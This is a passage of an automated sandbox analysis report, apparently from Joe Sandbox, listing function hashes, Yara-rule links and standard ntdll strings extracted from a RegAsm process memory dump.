Opcode Fuzzy Hash: 6ac8f18a081ef76be7e847e9713e2cebf2fdaacd39b533bf64f4146e9cacf2be
Instruction Fuzzy Hash: 7CD0A738611241CFCF16EF15C990DAEB2B4EB40740B44007CFE0059430D32EDD01C710

Function 0338A830 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction ID: 0309b4dde796d6c4a55a11fea67f2ff7c7b7318a60fbebcc36469ecb1596ae50
Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction Fuzzy Hash: 2BD0123B1D064CBBCB11DF65DC41F957BA9E754BA0F448020B5048B5A0C67AE950D584

Function 0338C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: adaf4c54bcd921660b1681496afb5e9161d98749039e8115db87dca80c952974
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: 1CC08C3B290748AFC712EF98CD41F027BA9EB98B50F004021F3048B670C671FC20EA84

Function 03370310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 9e84aad45aad587ad9a5ffbe5631090beec81d11cf255705e503640fefe94459
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 72D01236100248EFCB15DF51C890D9AB72AFBC8710F148019FD190B7108A35ED62DA50

Function 03350750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 4e46aab3b70a956fad3dc849e04135e5798e983882706023d0ce16ff840dcce4
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 58C04879B01A418FCF19EB2AD6E4F4977E8FB44B90F1948D0E905CBB32E624E801CA10

Function 03394340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38343d87cfada9b6d37f93a0f767ecdf1e10ca14f917e6b2dc1444f75d16aa28
Instruction ID: 249ecf5ddd689ab106b44139cbe985e15e1b47b8066e960f322fdba4ecacc221
Opcode Fuzzy Hash: 38343d87cfada9b6d37f93a0f767ecdf1e10ca14f917e6b2dc1444f75d16aa28
Instruction Fuzzy Hash: 6D900275B15C04129140B19C48C85464405D7E0301B55C011E0424954C8B148A565361

Function 03394650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c90369f1f46994920c19f376ef101b622c78d718516fdb98ddf0421d2978802
Instruction ID: 8b3f112558c985ea787b6aa354484920cf0908f5560a7bd7477a36297b0d34a2
Opcode Fuzzy Hash: 2c90369f1f46994920c19f376ef101b622c78d718516fdb98ddf0421d2978802
Instruction Fuzzy Hash: 2E9002A5B11904424140B19C48484066405D7E1301395C115A0554960C871889559269

Function 03392BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a3f254bebe1f48ff63a5de9e811c2cb90f2513d7d7c082a5e97154b03f27f4f
Instruction ID: 467468958e8601010f0f2c329e5829b33d0d84fd748c84e8951e61137fc6d2c3
Opcode Fuzzy Hash: 0a3f254bebe1f48ff63a5de9e811c2cb90f2513d7d7c082a5e97154b03f27f4f
Instruction Fuzzy Hash: 70900275B1580C02D150B19C44587460405C7D0301F55C011A0024A54D87558B5576A1

Function 03392B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e612e34b181e079ccdf479f54a32a29593d03dbd574946bfcdffcce52d6de48f
Instruction ID: cd78c87087c0dff815e3310ea139daf3868fe0e32cb4c05f25c65cf50c7fb50d
Opcode Fuzzy Hash: e612e34b181e079ccdf479f54a32a29593d03dbd574946bfcdffcce52d6de48f
Instruction Fuzzy Hash: 3A90027571180C02D104B19C48486860405C7D0301F55C011A6024A55E976589917131

Function 03392BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 323112e9c3ae2d94d8658cd591ed92968b8f22680d6c486829272cf3e1121d14
Instruction ID: cd0a5c85e0dfb4f80ac5f00afcf051db64bc92fa09d27f61d25cac483c651d5c
Opcode Fuzzy Hash: 323112e9c3ae2d94d8658cd591ed92968b8f22680d6c486829272cf3e1121d14
Instruction Fuzzy Hash: D390027571584C42D140B19C4448A460415C7D0305F55C011A0064A94D97258E55B661

Function 03392AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7a9e04b7cad5146dec69df7cf985d1a1a2d1c2855bbfcf54b4cf02200b305d3
Instruction ID: 9f7117c19410cac48ce3991a258c0363f2bcc4a2fc9b717d0f7cb798d374872d
Opcode Fuzzy Hash: d7a9e04b7cad5146dec69df7cf985d1a1a2d1c2855bbfcf54b4cf02200b305d3
Instruction Fuzzy Hash: A59002E5711944924500F29C8448B0A4905C7E0201B55C016E1054960CC62589519135

Function 03392AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7296c2bf8cd4a7cfcbe4c90012167fe7b03899f8a9d7771106bcff7b038ca2e
Instruction ID: dad8ae84e35b7461adbb47fe045d35290f93c628ebf0502bd367f3022366eac2
Opcode Fuzzy Hash: a7296c2bf8cd4a7cfcbe4c90012167fe7b03899f8a9d7771106bcff7b038ca2e
Instruction Fuzzy Hash: 9B900269731804020145F59C064850B0845D7D6351395C015F1416990CC72189655321

Function 03392F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fe44a73a332290448b79f11baca452cd071b82d3cb0277b696a499321dee556
Instruction ID: 246462dc84cc5ecb7f855069283a90274dd1248f54ca4832598c823fc41c8600
Opcode Fuzzy Hash: 6fe44a73a332290448b79f11baca452cd071b82d3cb0277b696a499321dee556
Instruction Fuzzy Hash: 189002A572180442D104B19C44487060445C7E1201F55C012A2154954CC6298D615125

Function 03392FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a561fc245ce5d1fa1079a766d4b7f987829220ef93c68e0a6afaeea1ac4c4868
Instruction ID: 2bd0b47e4e6842b54c925d7633674f0ea360486e27bbcfbd249dc8b90d69f67c
Opcode Fuzzy Hash: a561fc245ce5d1fa1079a766d4b7f987829220ef93c68e0a6afaeea1ac4c4868
Instruction Fuzzy Hash: 14900275711C0802D100B19C484C7470405C7D0302F55C011A5164955E8765C9916531

Function 03392E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b74503ede2f8dd6d42539ae7fbc096565d3fea40cf349fa8037a95998c3f6a51
Instruction ID: 1f9d3fd598fd68b98243ea60b3f63e75af34f082a4a538f34fd4ecdd07bb3dfa
Opcode Fuzzy Hash: b74503ede2f8dd6d42539ae7fbc096565d3fea40cf349fa8037a95998c3f6a51
Instruction Fuzzy Hash: 9790026571180802D102B19C44586060409C7D1345F95C012E1424955D87258A53A132

Function 03392EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28ebc4fadc582d01aa78b95fa9474610e692e80943c03b75fd8b9172ef40fac2
Instruction ID: 6a1b37b8543d45704ea7fbf7df73b69d8e627f8853a0c3cb19ca1d61332510ac
Opcode Fuzzy Hash: 28ebc4fadc582d01aa78b95fa9474610e692e80943c03b75fd8b9172ef40fac2
Instruction Fuzzy Hash: FA9002A5711C0803D140B59C48486070405C7D0302F55C011A2064955E8B298D516135

Function 03392D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7290ba7342ab7b9ae2428d0e0a1b8817517c58af7159ad1c4055c08599fcf344
Instruction ID: cf15ed6db2a503d4b578045b1c5544a14e06dea2f69a1255762d18d4a09274ab
Opcode Fuzzy Hash: 7290ba7342ab7b9ae2428d0e0a1b8817517c58af7159ad1c4055c08599fcf344
Instruction Fuzzy Hash: 3990026571584842D100B59C544CA060405C7D0205F55D011A1064995DC7358951A131

Function 03392DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7710c1270f454f6a3571b5071c1e45f0d656403c02a0ab77edf75449d12245b5
Instruction ID: c2a5a0c9facbbe2b6688da7a332a9c2284de342f77e7115d6732cac68b045332
Opcode Fuzzy Hash: 7710c1270f454f6a3571b5071c1e45f0d656403c02a0ab77edf75449d12245b5
Instruction Fuzzy Hash: A190027575180802D141B19C44486060409D7D0241F95C012A0424954E87558B56AA61

Function 03392C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdf7fbcb921fb519222b37fe1c21d9e939601bdbaa56ea93b5ecfadbd0723726
Instruction ID: 178e3b00694ff082bf6a247e4cccf773de991a515a0f8e2ce456a60b5e4a0965
Opcode Fuzzy Hash: cdf7fbcb921fb519222b37fe1c21d9e939601bdbaa56ea93b5ecfadbd0723726
Instruction Fuzzy Hash: 3090027571180C42D100B19C4448B460405C7E0301F55C016A0124A54D8715C9517521

Function 03392CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f9cd3e4f1e79d09ec10466d9501afe3d665c3becbd88cc0e00292ec1e19d8b6
Instruction ID: 5c6e562fdf365a77121f896a550864fe02e3ce942fbf6aa4b2e2f1dd33d10885
Opcode Fuzzy Hash: 5f9cd3e4f1e79d09ec10466d9501afe3d665c3becbd88cc0e00292ec1e19d8b6
Instruction Fuzzy Hash: 1B90027571180803D100B19C554C7070405C7D0201F55D411A0424958DD75689516121

Function 03392CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a528dee7439cea93e6d18705d1e37d6f8db7afc2e5eef80604bdcf46f9e0e710
Instruction ID: 2353c6d81c6d51c0f617d1e2f153d696e3ade32cf020bafaaa401b53b0fed421
Opcode Fuzzy Hash: a528dee7439cea93e6d18705d1e37d6f8db7afc2e5eef80604bdcf46f9e0e710
Instruction Fuzzy Hash: 4B900265B1580802D140B19C545C7060415C7D0201F55D011A0024954DC7598B5566A1

Function 03393010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7870051e425d6eb36e3481bda2bb566f157aab7c390606acdbac1c852e3c4d4e
Instruction ID: e9b64fa7ae6954539111c1fe2ff9f73ec9da38af0744e02fefe6db53ebf5bc47
Opcode Fuzzy Hash: 7870051e425d6eb36e3481bda2bb566f157aab7c390606acdbac1c852e3c4d4e
Instruction Fuzzy Hash: 1A900265711C4842D140B29C4848B0F4505C7E1202F95C019A4156954CCA1589555721

Function 03393090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9473fee2584418a0b52fdc3efd78bfcad9dd76405a6274e50737abcf18975d9e
Instruction ID: 096d2d47d2510ccf01fe3b97f1465f21c0077e554c213a106b2a4f92700b4d79
Opcode Fuzzy Hash: 9473fee2584418a0b52fdc3efd78bfcad9dd76405a6274e50737abcf18975d9e
Instruction Fuzzy Hash: 2890026575180C02D140B19C84587070406C7D0601F55C011A0024954D87168A6566B1

Function 033935C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a04ae53959a4a4e6770f54256110a9f79d22a7ba3991f3101221523a7ed07f56
Instruction ID: d1e47006506e3d70df2ae59c374d34cc3175cce5a7247403ce3cb2e540120164
Opcode Fuzzy Hash: a04ae53959a4a4e6770f54256110a9f79d22a7ba3991f3101221523a7ed07f56
Instruction Fuzzy Hash: BE900275B1590802D100B19C45587061405C7D0201F65C411A0424968D87958A5165A2

Function 033939B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e10f35a4edc0912dfb0f44dc14a1e20c7f00a4ad29b4002eff6894ce8ca34e
Instruction ID: e70203c7253050f036c483ad405205d2ecdf16ab4ed85ab0e30bd59074626c9a
Opcode Fuzzy Hash: 52e10f35a4edc0912dfb0f44dc14a1e20c7f00a4ad29b4002eff6894ce8ca34e
Instruction Fuzzy Hash: BF90026575585502D150B19C44486164405E7E0201F55C021A0814994D865589556221

Function 03393D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3481b284640870dcf1b29696d2d39a101d825cf6fa00fc3fae6eb2bbbd299faf
Instruction ID: e7200e527e151c2b802a839d4a3ed78ac4ed7a0ab70d450ee5627f18f23522d9
Opcode Fuzzy Hash: 3481b284640870dcf1b29696d2d39a101d825cf6fa00fc3fae6eb2bbbd299faf
Instruction Fuzzy Hash: 7E900275712805429540B29C5848A4E4505C7E1302B95D415A0015954CCA1489615221

Function 03393D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea6d69fdfa770b69c99bf15142c2749dea3094178ff8f66be0f0f3242c54c9f
Instruction ID: 4187289245d9a66f10e67002a36f6a023df910b84361b1dff35c5e8b6f10c4c4
Opcode Fuzzy Hash: 4ea6d69fdfa770b69c99bf15142c2749dea3094178ff8f66be0f0f3242c54c9f
Instruction Fuzzy Hash: 2C90027971180802D510B19C58486460446C7D0301F55D411A0424958D875489A1A121

Function 03392C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 255fea00f3049eb0a07f7243a86ac32026395370af18afa793978e5789f077d9
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 03392890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0339293C
___swprintf_l.LIBCMT ref: 0339295E
___swprintf_l.LIBCMT ref: 033929A3
___swprintf_l.LIBCMT ref: 033CA52E

Strings

:%u.%u.%u.%u, xrefs: 033CA5B8
::%hs%u.%u.%u.%u, xrefs: 033CA527
::ffff:0:%u.%u.%u.%u, xrefs: 033CA54E
ffff:, xrefs: 033CA504

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 82c7e86cfeec14a67d24c76d434c84005352890c76edd82c50e807e76dcf3bff
Instruction ID: c2fb28d54d9bfd7e48a7467ce9b4b395784d35f8fbdd63091d19b655f279060c
Opcode Fuzzy Hash: 82c7e86cfeec14a67d24c76d434c84005352890c76edd82c50e807e76dcf3bff
Instruction Fuzzy Hash: EC51B8B6A0455ABFDF10DB988DD097FFBBCBB08201B14C56AE4A5D7641D234EE508BE0

Function 03402410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 034024A6
___swprintf_l.LIBCMT ref: 034024E2
___swprintf_l.LIBCMT ref: 0340257D
___swprintf_l.LIBCMT ref: 034025A3
___swprintf_l.LIBCMT ref: 034025C8
___swprintf_l.LIBCMT ref: 03402608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 034024DA
::%hs%u.%u.%u.%u, xrefs: 0340249E
:%u.%u.%u.%u, xrefs: 034025FF
ffff:, xrefs: 0340247D, 0340249D

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 31d18e8436762a9697924a8c58c6107ded8b52f2989187dc4c849e5e23b5653a
Instruction ID: bbd2c830294c44324c312c41f4197646a4cfae380611ce12a1e71c46e193a91d
Opcode Fuzzy Hash: 31d18e8436762a9697924a8c58c6107ded8b52f2989187dc4c849e5e23b5653a
Instruction Fuzzy Hash: 1C51F575B00645AECB70DF9CC99497FF7F9EB44200B04886BE4A5DB6C1D7B4EA008764

Function 03387630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033C46FC
CLIENT(ntdll): Processing section info %ws..., xrefs: 033C4787
Execute=1, xrefs: 033C4713
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 033C4725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 033C4655
ExecuteOptions, xrefs: 033C46A0
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 033C4742

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 3a0f4fa14302aefcd52c69f4470e6d68731ea177dcde8846a67321ed4dc7e4de
Instruction ID: d605242e54b76770d6a16280fa114b4b3f4fc26df2b8cab5d9cb3ee8e5f3e43a
Opcode Fuzzy Hash: 3a0f4fa14302aefcd52c69f4470e6d68731ea177dcde8846a67321ed4dc7e4de
Instruction Fuzzy Hash: 68510739A00319AAEF11FFA5DCD5FBE73A9AF05300F1800A9E505AB181EB709E45CB50

Function 0339B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0339B6BF

Strings

+, xrefs: 0339B65A
0, xrefs: 0339B66F
-, xrefs: 0339B650
0, xrefs: 0339B695

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: cac77da8090d80f907b2fd5eedbdc98dbc4af957620d61883fcffc4b48f88cdf
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 01819E74E05249DAFF24CE68ECD17FEFBA5AF45350F1C429BE861A7390C63498408B61

Function 034020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0340214F
___swprintf_l.LIBCMT ref: 03402172

Strings

]:%u, xrefs: 03402169
%%%u, xrefs: 03402146
[, xrefs: 0340212B

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: c8c89fce3e8307de8f85bf566edf30bd3be900ff2e4bb90242d23ccabbdb36be
Instruction ID: 4af3a6a2afbcd5bd17005d10265704970a7c3db2529a93ab8a06cdbe55022e3d
Opcode Fuzzy Hash: c8c89fce3e8307de8f85bf566edf30bd3be900ff2e4bb90242d23ccabbdb36be
Instruction Fuzzy Hash: A9219776E00219ABDB10DF79CC449EFBBF8EF44640F080527E955DB280E770D9018B94

Function 0337F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033C02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033C02E7
RTL: Re-Waiting, xrefs: 033C031E

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 496ec12ef800b49030d5083ef372cd5f167761000035a3255d78eae3127226fb
Instruction ID: 62a5516ae02ff7c46feb13275bf0e4552a5199deb221eef729fbe6d180b5a3e8
Opcode Fuzzy Hash: 496ec12ef800b49030d5083ef372cd5f167761000035a3255d78eae3127226fb
Instruction Fuzzy Hash: 54E1AA74618781DFD724CF28C8C4B6AB7E4BB88724F180A6DF4A58B6E1D778D944CB42

Function 0338BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 033C7B7F
RTL: Resource at %p, xrefs: 033C7B8E
RTL: Re-Waiting, xrefs: 033C7BAC

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
